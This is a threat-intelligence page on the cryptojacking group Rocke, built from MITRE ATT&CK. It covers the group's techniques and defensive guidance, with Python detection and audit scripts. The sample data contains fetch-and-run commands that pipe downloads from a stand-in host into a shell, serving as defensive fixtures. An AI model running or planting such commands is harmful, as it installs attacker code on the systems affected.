G0106: Rocke
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.[1]
Analyst context for executives and security teams
Rocke matters because the ATT&CK entry describes a group whose apparent objective was cryptojacking: stealing victim compute resources to mine cryptocurrency. For leaders, the business issue is not only malware cleanup; it is unexpected cloud or infrastructure cost, degraded service performance, and evidence that internet-facing systems, SSH access, persistence controls, and egress monitoring may be weak.
Executive priority
Treat this as a resilience and exposure-management use case. Ask whether public-facing applications are patched and inventoried, whether SSH and privileged access are governed, whether SOC telemetry can see Unix shell/Python execution and scheduled persistence, and whether finance/operations would notice abnormal compute consumption. Because MITRE provides no official detection text and the group platform field is not specified, priority should be based on local exposure to the related techniques rather than assumptions about where Rocke is present.
Technical view
The relationship context points defenders toward a chain involving exploitation of public-facing applications, discovery of systems/services/processes, SSH-based lateral movement, Unix shell and Python execution, tool transfer, web-based C2, obfuscation/deobfuscation, persistence through cron or boot/logon scripts, file deletion/timestomping, and possible rootkit or injection-style stealth. Validate coverage around these behaviors, especially on internet-facing Unix-like, cloud, ESXi, container, and network-device contexts where related techniques list support them, while noting that the Rocke group object itself does not specify platforms or tactics.
Likely telemetry
- Internet-facing application, web server, container, IaaS, and ESXi exposure logs relevant to exploitation attempts and successful access
- SSH authentication, session, source/destination, and account-use records
- Process execution and command-line telemetry for Unix shells, Python, compilers, scanners, download utilities, and miner-like processes where locally applicable
- Cron, boot/logon initialization script, service, and startup file change records
- Network flow, DNS, proxy, and HTTP/S telemetry for external web services, tool transfer, and command-and-control-like connections
Detection direction
- Because MITRE supplies no official detection guidance for Rocke, build detections from the related ATT&CK techniques rather than a single group signature.
- Correlate public-facing application anomalies with follow-on shell/Python execution, file downloads, service discovery, process discovery, and new scheduled tasks.
- Tune SSH detections for unusual source hosts, first-seen account-to-host pairs, unexpected lateral movement, and activity following exploitation indicators; account for legitimate administration to reduce false positives.
- Baseline cron and boot/logon initialization scripts so new or modified persistence entries stand out, especially when paired with outbound web traffic or high CPU use.
- Look for obfuscated or packed artifacts, decode/deobfuscation activity, suspicious file deletion, and timestamp inconsistencies, but avoid over-reliance on file signatures because several related techniques explicitly support stealth.
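The correlation described in the detection direction above, as an added example that is not part of the ATT&CK object or Glexia's text: it walks constructed process-creation, SSH-login and file-write telemetry and raises three kinds of hit (a web-server process spawning a shell, Python or a download utility; a first-seen SSH account-to-host pair versus a baseline; a write to a cron, init.d, systemd or ld.so.preload path), then escalates a persistence write to high severity when the same host had one of the precursors inside a short window. The event field names, the process-name sets and the 30-minute window are assumptions for the example, and the sample events are constructed.

```python
"""Correlation logic for a Rocke-style chain: web-to-shell spawns, first-seen
SSH pairs and persistence-path writes, escalated when they cluster on a host."""
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed names for the example (tune to the local stack); not from the ATT&CK page.
WEB_PARENTS = {"java", "httpd", "nginx", "apache2"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "python", "python3", "wget", "curl"}
PERSISTENCE_PREFIXES = ("/etc/cron", "/var/spool/cron", "/etc/init.d/",
                        "/etc/systemd/system/", "/etc/ld.so.preload")
CORRELATION_WINDOW = timedelta(minutes=30)


@dataclass
class ProcEvent:  # process creation record (auditd/EDR style; field names assumed)
    ts: datetime
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class SshEvent:  # successful SSH login (sshd auth log; field names assumed)
    ts: datetime
    host: str
    user: str
    src: str


@dataclass
class FileEvent:  # file write record (auditd/file-integrity style; field names assumed)
    ts: datetime
    host: str
    path: str
    image: str


def web_to_shell(events: list[ProcEvent]) -> list[ProcEvent]:
    """Web-server process spawning a shell, Python, or a download utility."""
    return [e for e in events
            if e.parent in WEB_PARENTS and e.image in SUSPICIOUS_CHILDREN]


def first_seen_ssh(events: list[SshEvent], baseline: set[tuple[str, str]]) -> list[SshEvent]:
    """SSH logins whose (user, host) pair is absent from the known-good baseline."""
    seen = set(baseline)
    hits = []
    for e in events:
        if (e.user, e.host) not in seen:
            hits.append(e)
            seen.add((e.user, e.host))  # report each new pair once
    return hits


def persistence_writes(events: list[FileEvent]) -> list[FileEvent]:
    """Writes under cron, init.d, systemd, or to ld.so.preload."""
    return [e for e in events if e.path.startswith(PERSISTENCE_PREFIXES)]


def correlate(procs, sshs, files, baseline):
    """Return (message, severity) pairs. A persistence write is 'high' when the
    same host had a web-to-shell spawn or first-seen SSH login within
    CORRELATION_WINDOW before it; isolated hits are 'medium'."""
    alerts = []
    precursors = {}  # host -> timestamps of precursor hits
    for e in web_to_shell(procs):
        alerts.append((f"{e.host}: {e.parent} spawned {e.image}: {e.cmdline}", "medium"))
        precursors.setdefault(e.host, []).append(e.ts)
    for e in first_seen_ssh(sshs, baseline):
        alerts.append((f"{e.host}: first-seen SSH login for {e.user} from {e.src}", "medium"))
        precursors.setdefault(e.host, []).append(e.ts)
    for e in persistence_writes(files):
        related = any(timedelta(0) <= e.ts - t <= CORRELATION_WINDOW
                      for t in precursors.get(e.host, []))
        alerts.append((f"{e.host}: {e.image} wrote {e.path}", "high" if related else "medium"))
    return alerts


# Constructed sample telemetry (not real data).
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_PROCS = [
    ProcEvent(T0, "web01", "tomcat", "java", "sh",
              "sh -c 'wget -q -O /tmp/java http://example.invalid/a'"),
    ProcEvent(T0 + timedelta(minutes=1), "web01", "tomcat", "java", "java", "java -jar app.jar"),
]
SAMPLE_SSH = [
    SshEvent(T0 + timedelta(minutes=5), "db02", "root", "web01"),  # pair not in baseline
    SshEvent(T0 + timedelta(minutes=6), "db02", "dba", "jump01"),  # routine administration
]
SAMPLE_FILES = [
    FileEvent(T0 + timedelta(minutes=3), "web01", "/var/spool/cron/crontabs/root", "sh"),
    FileEvent(T0 + timedelta(minutes=7), "db02", "/etc/ld.so.preload", "bash"),
    FileEvent(T0 + timedelta(hours=5), "build03", "/etc/systemd/system/backup.service", "ansible"),
    FileEvent(T0, "web01", "/var/log/app.log", "java"),
]
BASELINE = {("dba", "db02"), ("deploy", "web01")}


def run_sample():
    return correlate(SAMPLE_PROCS, SAMPLE_SSH, SAMPLE_FILES, BASELINE)


if __name__ == "__main__":
    for message, severity in run_sample():
        print(f"[{severity}] {message}")
```

On the constructed input the two persistence writes that follow a precursor on the same host (web01 cron after the java-to-sh spawn, db02 ld.so.preload after the first-seen root login) come out high, while the unrelated systemd unit written by a configuration-management tool stays medium; the baseline set is where legitimate administration pairs are recorded to keep SSH noise down.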
Mitigation priorities
- Start with exposure reduction: maintain an accurate inventory of internet-facing applications and services, prioritize patching or configuration fixes for externally reachable weaknesses, and remove unnecessary exposure.
- Harden identity and remote access: restrict SSH access, enforce least privilege, review valid account use, and monitor administrative access paths.
- Limit execution and persistence opportunities by controlling script execution where feasible, reviewing cron and initialization paths, and applying change control to startup mechanisms.
- Constrain and inspect egress paths for servers and cloud workloads, especially outbound web traffic and file transfer patterns not required for business operations.
- Improve host and workload visibility for process execution, file integrity, scheduled tasks, and resource consumption so cryptojacking-style activity is observable before it becomes an availability or cost issue.
Analyst notes and limits
The ATT&CK description characterizes Rocke as an alleged Chinese-speaking adversary with an apparent cryptojacking objective and notes unconfirmed overlap with Iron Cybercrime Group. The relationship set is broad and provides the practical defensive map: initial access, discovery, lateral movement, execution, persistence, stealth, tool transfer, and web-based command-and-control behaviors. Use this object primarily to test whether controls can detect and respond to resource-theft intrusions rather than to make attribution claims.
The supplied group object has no official detection text, no specified platforms, and no specified tactics. Platform and tactic references in this take come only from related technique context, not from the Rocke group field itself. Local telemetry, asset exposure, application stack, cloud usage, and account behavior are required to determine actual risk and detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1190 | Exploit Public-Facing Application | Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware. [Talos Rocke August 2018; Unit 42 Rocke January 2019] |
| Enterprise | T1014 | Rootkit | Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists. [Anomali Rocke March 2019] |
| Enterprise | T1027 | Obfuscated Files or Information | Rocke has modified UPX headers after packing files to break unpackers. [Anomali Rocke March 2019] |
| Enterprise | T1102 | Web Service | Rocke has used Pastebin, Gitee, and GitLab for Command and Control. [Anomali Rocke March 2019; Talos Rocke August 2018] |
| Enterprise | T1059.004 | Unix Shell Sub-technique | Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware. [Talos Rocke August 2018] |
| Enterprise | T1082 | System Information Discovery | Rocke has used uname -m to collect the name and information about the infected system's kernel. [Anomali Rocke March 2019] |
| Enterprise | T1071 | Application Layer Protocol | Rocke issued wget requests from infected systems to the C2. [Talos Rocke August 2018] |
| Enterprise | T1105 | Ingress Tool Transfer | Rocke used malware to download additional malicious files to the target system. [Talos Rocke August 2018] |
| Enterprise | T1496.001 | Compute Hijacking Sub-technique | Rocke has distributed cryptomining malware. [Talos Rocke August 2018; Unit 42 Rocke January 2019] |
| Enterprise | T1027.004 | Compile After Delivery Sub-technique | Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC). [Anomali Rocke March 2019] |
| Enterprise | T1574.006 | Dynamic Linker Hijacking Sub-technique | Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists. [Anomali Rocke March 2019] |
| Enterprise | T1564.001 | Hidden Files and Directories Sub-technique | Rocke downloaded a file "libprocesshider", which could hide files on the target system. [Talos Rocke August 2018; Unit 42 Rocke January 2019] |
| Enterprise | T1053.003 | Cron Sub-technique | Rocke installed a cron job that downloaded and executed files from the C2. [Talos Rocke August 2018; Unit 42 Rocke January 2019; Anomali Rocke March 2019] |
| Enterprise | T1059.006 | Python Sub-technique | Rocke has used Python-based malware to install and spread their coinminer. [Anomali Rocke March 2019] |
| Enterprise | T1046 | Network Service Discovery | Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers. [Talos Rocke August 2018; Anomali Rocke March 2019] |
| Enterprise | T1055.002 | Portable Executable Injection Sub-technique | Rocke's miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe. [Talos Rocke August 2018] |
| Enterprise | T1102.001 | Dead Drop Resolver Sub-technique | Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware. [Anomali Rocke March 2019] |
| Enterprise | T1037 | Boot or Logon Initialization Scripts | Rocke has installed an "init.d" startup script to maintain persistence. [Anomali Rocke March 2019] |
| Enterprise | T1027.002 | Software Packing Sub-technique | Rocke's miner has created UPX-packed files in the Windows Start Menu Folder. [Talos Rocke August 2018; Unit 42 Rocke January 2019; Anomali Rocke March 2019] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Rocke's miner has created UPX-packed files in the Windows Start Menu Folder. [Talos Rocke August 2018] |
| Enterprise | T1222.002 | Linux and Mac Permissions Sub-technique | Rocke has changed file permissions of files so they could not be modified. [Anomali Rocke March 2019] |
| Enterprise | T1057 | Process Discovery | Rocke can detect a running process's PID on the infected machine. [Anomali Rocke March 2019] |
| Enterprise | T1543.002 | Systemd Service Sub-technique | Rocke has installed a systemd service script to maintain persistence. [Anomali Rocke March 2019] |
| Enterprise | T1018 | Remote System Discovery | Rocke has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them. [Talos Rocke August 2018] |
| Enterprise | T1686 | Disable or Modify System Firewall | Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers. [Talos Rocke August 2018] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Rocke has extracted tar.gz files after downloading them from a C2 server. [Talos Rocke August 2018] |
| Enterprise | T1685.006 | Clear Linux or Mac System Logs Sub-technique | Rocke has cleared log files within the /var/log/ folder. [Anomali Rocke March 2019] |
| Enterprise | T1552.004 | Private Keys Sub-technique | Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network. [Anomali Rocke March 2019] |
| Enterprise | T1070.004 | File Deletion Sub-technique | Rocke has deleted files on infected machines. [Anomali Rocke March 2019] |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol. [Anomali Rocke March 2019] |
| Enterprise | T1685 | Disable or Modify Tools | Rocke used scripts which detected and uninstalled antivirus software. [Talos Rocke August 2018; Unit 42 Rocke January 2019] |
| Enterprise | T1571 | Non-Standard Port | Rocke's miner connects to a C2 server using port 51640. [Anomali Rocke March 2019] |
| Enterprise | T1021.004 | SSH Sub-technique | Rocke has spread its coinminer via SSH. [Anomali Rocke March 2019] |
| Enterprise | T1070.006 | Timestomp Sub-technique | Rocke has changed the time stamp of certain files. [Anomali Rocke March 2019] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Rocke has used shell scripts which download mining executables and save them with the filename "java". [Talos Rocke August 2018] |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Rocke used scripts which detected and uninstalled antivirus software. [Talos Rocke August 2018; Unit 42 Rocke January 2019] |
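A host-side audit for the Linux persistence and stealth artifacts the table lists, added here as an example and not taken from the ATT&CK object, Glexia, or the cited reports. Given a root directory (a live system's "/" or an offline-mounted image) it reports non-empty /etc/ld.so.preload entries (T1014, T1574.006), cron, init.d and systemd files that fetch or pipe content from the network (T1053.003, T1037, T1543.002), executables named "java" outside the usual JDK locations (T1036.005), and files whose modification time is far older than their inode change time, a weak timestomp hint (T1070.006) that also fires after a plain chmod (T1222.002), so it is context rather than a verdict. The directory list, the "expected java" prefixes, the regex and the one-day threshold are assumptions; build_demo_root() writes a throwaway tree with constructed artifacts so the audit can be run offline.

```python
"""Audit a filesystem root for Rocke-style Linux persistence and stealth artifacts."""
from __future__ import annotations
import os
import re
import stat
import tempfile

# Assumed locations and patterns for the example; tune to the local build.
NET_FETCH = re.compile(r"\b(wget|curl|pastebin|gitee|gitlab)\b", re.I)
PERSISTENCE_DIRS = ("etc/cron.d", "etc/cron.hourly", "etc/cron.daily",
                    "var/spool/cron", "etc/init.d", "etc/systemd/system")
EXPECTED_JAVA_PARENTS = ("/usr/lib/jvm/", "/usr/bin/", "/opt/java/", "/usr/java/")
TIMESTOMP_GAP_SECONDS = 86400  # mtime more than a day older than ctime


def _read(path: str) -> str:
    try:
        with open(path, errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def audit(root: str) -> list[tuple[str, str]]:
    """Return (check, detail) findings for the filesystem rooted at `root`."""
    findings = []
    preload = _read(os.path.join(root, "etc/ld.so.preload")).strip()
    if preload:  # any entry here is loaded into every dynamically linked process
        findings.append(("ld.so.preload", preload))
    for rel in PERSISTENCE_DIRS:
        d = os.path.join(root, rel)
        if not os.path.isdir(d):
            continue
        for dirpath, _, names in os.walk(d):
            for n in names:
                p = os.path.join(dirpath, n)
                if NET_FETCH.search(_read(p)):
                    findings.append(("persistence fetches from network", p))
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            rel_path = "/" + os.path.relpath(p, root)
            if n == "java" and st.st_mode & 0o111 and not rel_path.startswith(EXPECTED_JAVA_PARENTS):
                findings.append(("java outside expected location", rel_path))
            if st.st_ctime - st.st_mtime > TIMESTOMP_GAP_SECONDS:
                findings.append(("mtime older than ctime (timestomp hint)", rel_path))
    return findings


def build_demo_root() -> str:
    """Construct a throwaway tree carrying each artifact class (constructed data)."""
    root = tempfile.mkdtemp(prefix="rocke_audit_demo_")

    def put(rel, text, mode=0o644):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(text)
        os.chmod(p, mode)
        return p

    put("etc/ld.so.preload", "/usr/local/lib/libprocesshider.so\n")
    put("var/spool/cron/crontabs/root", "*/10 * * * * curl -fsSL http://example.invalid/x | sh\n")
    put("etc/systemd/system/cleanup.service", "[Service]\nExecStart=/usr/bin/find /tmp -mtime +7 -delete\n")
    put("tmp/java", "#!/bin/sh\n", 0o755)                 # miner dropped under a benign name
    put("usr/lib/jvm/jre/bin/java", "#!/bin/sh\n", 0o755)  # where a real JRE lives
    stomped = put("etc/cron.d/sysupdate", "0 * * * * root /usr/bin/wget -q http://example.invalid/u -O- | sh\n")
    os.utime(stomped, (1_500_000_000, 1_500_000_000))  # mtime pushed back to 2017; ctime stays now
    return root


def run_demo() -> list[tuple[str, str]]:
    return audit(build_demo_root())


if __name__ == "__main__":
    for check, detail in run_demo():
        print(f"{check}: {detail}")
```

Against a real system, scope the final walk to the directories that matter (/tmp, /var/tmp, /dev/shm, home directories, the persistence paths) rather than "/", and diff the output against a baseline taken from a clean build, since the network-fetch regex will also match legitimate package or CI hooks.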
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table can be opened to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 493d858defd7… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Talos Rocke August 2018: Liebenberg, D. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.
[2] mitre-attack G0106: MITRE ATT&CK source object for this group.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.